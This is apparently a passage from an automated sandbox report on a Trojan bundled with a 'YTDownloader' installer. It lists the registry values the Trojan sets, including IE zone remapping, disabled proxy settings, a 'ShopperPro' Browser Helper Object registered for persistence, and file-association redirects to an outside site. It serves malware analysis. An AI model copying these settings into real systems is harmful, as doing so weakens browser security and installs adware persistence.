[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "2"
"MaxConnectionsPer1_0Server" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\YTDownloader\Success]
"InstallStr" = "ok"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 11 05 C6 E4 5B F8 FC 8B DE A4 69 F2 A2 1B 39"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:2404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 FF 9D D4 35 56 E5 1F 35 FB 5E 73 B5 5D 62 B9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:2680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 AB 30 9D D4 83 14 C0 10 4C 75 7B 85 BF 68 27"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:2692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C 32 C3 84 01 92 72 21 AA B6 24 92 CB 7A 42 5E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:2388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 2D 13 F3 2B 3B B6 01 B0 96 D9 62 9B 01 E0 F7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ns19.tmp:2196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process net.exe:2972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process net.exe:2748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process regsvr32.exe:2224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\InprocServer32]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

[HKCR\ShopperPro.ShopperProBHO\CurVer]
"(Default)" = "ShopperPro.ShopperProBHO.1"

[HKCR\AppID\{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}]
"(Default)" = "ShopperPro"

[HKCR\AppID\ShopperPro.DLL]
"AppID" = "{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}"

[HKCR\ShopperPro.ShopperProBHO]
"(Default)" = "Shopper Pro"

[HKCR\ShopperPro.ShopperProBHO.1\CLSID]
"(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\ProgID]
"(Default)" = "ShopperPro.ShopperProBHO.1"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "Shopper Pro"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
"Version" = "1.0"

[HKCR\ShopperPro.ShopperProBHO\CLSID]
"(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"

[HKCR\ShopperPro.ShopperProBHO.1]
"(Default)" = "Shopper Pro"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0]
"(Default)" = "ShopperPro 1.0 Type Library"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 A3 C6 09 3D 02 BE 65 10 6B 78 27 60 05 20 B8"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\VersionIndependentProgID]
"(Default)" = "ShopperPro.ShopperProBHO"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}]
"(Default)" = "IShopperProBHO"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "ShopperProBHO"

"NoExplorer" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]

The process ins_sense.exe:3272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "ED 17 0E E3 4B 91 E2 12 16 72 CF 2D 50 87 3C FE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process setup.exe:2504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5]
"(Default)" = "Animation GIF Control"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"ExeLocation" = "%Program Files%\YTDownloader\Converter.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\AniGIFPpg.AniGIFPpg]
"(Default)" = "AniGIFPpg Class"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "IAniGIF"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKCR\AniGIFCtrl.AniGIF\CurVer]
"(Default)" = "AniGIFCtrl.AniGIF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"intl" = "http://www.fileextensionpro.com/redir.aspx?s=obrdc1_0_0_0_0,99999999-9999-4bd6-97ff-f15d28801c02,&LangID=x&Ext=%s"

[HKLM\SOFTWARE\YTDownloader]
"ExeLocation" = "%Program Files%\YTDownloader\YTDownloader.exe"
"Version" = "1.0.8654.1137"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"UninstallString" = "%Program Files%\YTDownloader\YTDUninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"Application" = "http://www.fileextensionpro.com/redir.aspx?s=obrdc1_0_0_0_0,99999999-9999-4bd6-97ff-f15d28801c02,&LangID=x&Ext=%s"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "Animation GIF Control"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"FFUseConverter" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"Publisher" = "YTDownloader"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ToolboxBitmap32]
